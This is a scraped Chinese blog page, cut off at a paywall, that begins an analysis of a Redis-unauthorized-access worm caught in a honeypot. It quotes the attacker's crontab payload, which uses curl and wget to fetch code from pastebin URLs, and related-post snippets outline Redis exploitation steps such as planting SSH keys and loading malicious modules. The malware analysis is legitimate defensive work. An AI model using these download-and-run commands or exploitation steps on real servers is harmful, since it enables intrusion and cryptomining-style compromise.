一次Redis未授权访问漏洞入侵分析

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量1.7k 收藏 3
点赞数
分类专栏: 云计算 云安全 开源 文章标签: Redis 云安全 滴滴云 开源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/java060515/article/details/84392804
版权

0x00 简介

通过之前部署的蜜罐系统,我近日在滴滴云上捕获到了一个通过 Redis 未授权访问漏洞进行入侵的蠕虫样本,该样本的特点是使用 Python 脚本进行横向漏洞扫描,并且具有进程隐藏和卸载某些云上安全产品的功能。

0x01 样本分析

通过蜜罐日志得到攻击者入侵开始于通过 Redis 写 crontab:
在这里插入图片描述
命令中的 URL https://pastebin.com/raw/1NtRkBc3 其实是一个中转,实际样本文件为 https://pastebin.com/raw/tRxfvbYN 在 base64 解码后的结果为:

curl https://pastebin.com/raw/1NtRkBc3

(curl -fsSL https://pastebin.com/raw/tRxfvbYN || wget -q -O- https://pastebin.com/raw/t
最低0.47元/天 解锁文章
付江
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
修补--Redis授权访问漏洞
weixin_30342209的博客
01-09 330
--------------------------------阿里解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致授权访问,被攻击者恶意利用。当前流行的针对Redis授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
Redis授权访问攻击场景分析与防御
si1ence的博客
07-18 826
主要从redis授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。 0x0 应用介绍 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语...
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 1151
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
redis授权访问解析
weixin_46941625的博客
12-02 929
本篇主要从redis授权访问入手,还原一些黑客的攻击场景,介绍一些常用的攻击方法和安全知识。应用介绍漏洞介绍测试环境说明攻击方法redis日志 修复方案作者:悦潺@安全之光一. 应用介绍  Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。和Memcached类似,它支持存储的value 类型相对更多,包括 string(字符串)、list ( 链表)、 set(集合)、zset(sorted set – 有序集合)和 hash(哈希类型
服务器由于redis授权访问漏洞攻击
weixin_30692143的博客
06-20 163
昨天阿里拦截到了一次异常登陆,改了密码后就没有管他, 今天阿里给我发消息说我的服务器可能被黑客利用,存在恶意发包行为。。。。。。。 不过我不打算只是单纯的重置系统,经过一系列的查找原因后,发现被攻击的原因是我的redis没有设置登陆密码(redis 默认情况下,没有配置登陆密码,任意用户可以登录),被黑客利用然后获取到了我的root权限。 先用#ps -ef 命令看看有没有什么可疑...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
Redis授权访问漏洞
Kevin's Blog
06-11 860
一、写入WebShell 1.1 适用系统 Windows Linux 1.2 利用前提 Redis可扫到开放端口(对公网开放/渗透到内网环境) 没有设置IP访问限制,默认没有设置密码(在内网中很常见,公网基本绝迹) 可以知道web目录执行的绝对路径 存在写入权限 写入的动态脚本文件能够被执行 1.3 利用过程 》》可以通过站点报错拿到web路径 (这里略了,仅演示具体的操作) 》》使用redis客户端连入对方redis redis-cli -h <target-ip> 》》使用Redi
Redis授权访问
npc88888的博客
05-09 1628
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1932
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
【vulhub漏洞复现】redis 4-unacc 授权访问漏洞
RexHa的博客
03-03 4773
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
Redis授权访问漏洞利用及防护措施(非常详细)
热门推荐
7Riven's blog
11-29 1万+
靶机(centos6.6):192.168.109.150 攻击机(kali-linux 2019.3):192.168.109.148 漏洞环境配置部署见:https://blog.csdn.net/qq_41210745/article/details/103305262 1.nmap存活主机扫描 2.发现疑似目标主机,扫描端口服务:找到目标端口6379 3.ka...
redis授权访问漏洞
jiji_king的博客
07-07 1万+
个人笔记
记录一次redis漏洞攻击
陈浩然MC的博客
09-11 3268
服务器挖矿病毒的排查过程 事情起因:朋友的一台阿里主机,登录特别卡,找我看看 这一看就感觉出问题了,机器特别卡,top看了一眼,cpu几乎是100%运行 但是奇怪的是用top命令完全看不出来哪个进程占用资源,当时的截图找不到了,这是第一次遇到这种情况,没有显示今晨占用资源,偏偏资源被跑满 排查 刚接手问题的时候我也是一脸闷逼,很奇怪,明明是没有进程占用的,为什么还会这样? ...
redis漏洞利用
yangzl123的博客
06-21 1068
redis授权访问漏洞学习 1.       redis是什么 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis的外围由一个键、值映射的字典构成。为高速低负载存储系统提供了一种解决方案。   2.       redis授权访问 Redis 默认情况下,会绑定在 0.0.0.0:63
vulhub学习文档-Redis 4.x/5.x 授权访问漏洞
ploto_cs的博客
09-09 1395
Redis 4.x/5.x 授权访问漏洞 1.redis介绍 Redis 是一个高效数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。 2.适用类型 数据库版本在4.x/5.x以下 3.预防措施 ① Redis添加密码验证 ② Redis尽量
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值